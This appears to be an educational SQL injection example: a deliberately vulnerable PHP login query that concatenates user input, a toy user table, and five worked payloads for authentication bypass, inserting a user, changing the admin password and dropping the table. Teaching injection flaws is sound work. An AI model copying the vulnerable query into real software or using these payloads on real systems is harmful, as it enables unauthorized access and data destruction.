
Example 1

The following query checks whether the supplied username and password match an entry in the database. Both values are pasted straight into the SQL string, which is what every exploit below relies on.

<?php
// connect to database
$db = new PDO(CONNECTION_STRING, DB_USER, DB_PASS);
$query = "SELECT * FROM users WHERE user = '" . $_POST["user"] .
"' AND password = '" . $_POST["password"] . "'";
// if the result set is not empty, establish a session for the user found
...
?>

Our Database:

user      password    age
-------------------------
admin     1f4sdge!    37
mauro     mkfln34.    30
matteo    a4njDa!     42

Legitimate Use Case:

user: admin
password: 1f4sdge!
SELECT * FROM users WHERE user='admin' AND password='1f4sdge!'

Exploit 1: Authenticating as the admin.

-- followed by a space starts an inline comment; everything after it on the line is ignored by the database.

user: admin' -- -
password: whatever
SELECT * FROM users WHERE user='admin' -- -' AND password='whatever'

Exploit 2: Authenticating as the first user in the users list (here admin)

Less control than the previous payload.

% in a LIKE pattern matches an arbitrary sequence of characters, so the condition is always satisfied; because AND binds tighter than OR, every row matches and the application uses the first one returned.

user: admin
password: ' OR password LIKE '%
SELECT * FROM users WHERE user='admin' AND password='' OR password LIKE '%';

Exploit 3: Adding a new user, which damages data integrity

Only if stacked queries are enabled in the DB configuration.

user: '; INSERT INTO users (user,password, age) VALUES ('attacker', 'mypwd', 1) -- -
password: whatever
SELECT * FROM users WHERE user='';
INSERT INTO users (user, password, age) VALUES ('attacker', 'mypwd', 1)
-- -' AND password='whatever'

Exploit 4: Editing the admin's password

user: '; UPDATE users SET password='newpwd' WHERE user='admin'-- -
password: 
SELECT * FROM users WHERE user='';
UPDATE users SET password='newpwd' WHERE user='admin'
-- -' AND password=''

Exploit 5: Dropping the users table from the database

user: '; DROP TABLE users -- -
password: 
SELECT * FROM users WHERE user='';
DROP TABLE users -- -' AND password='';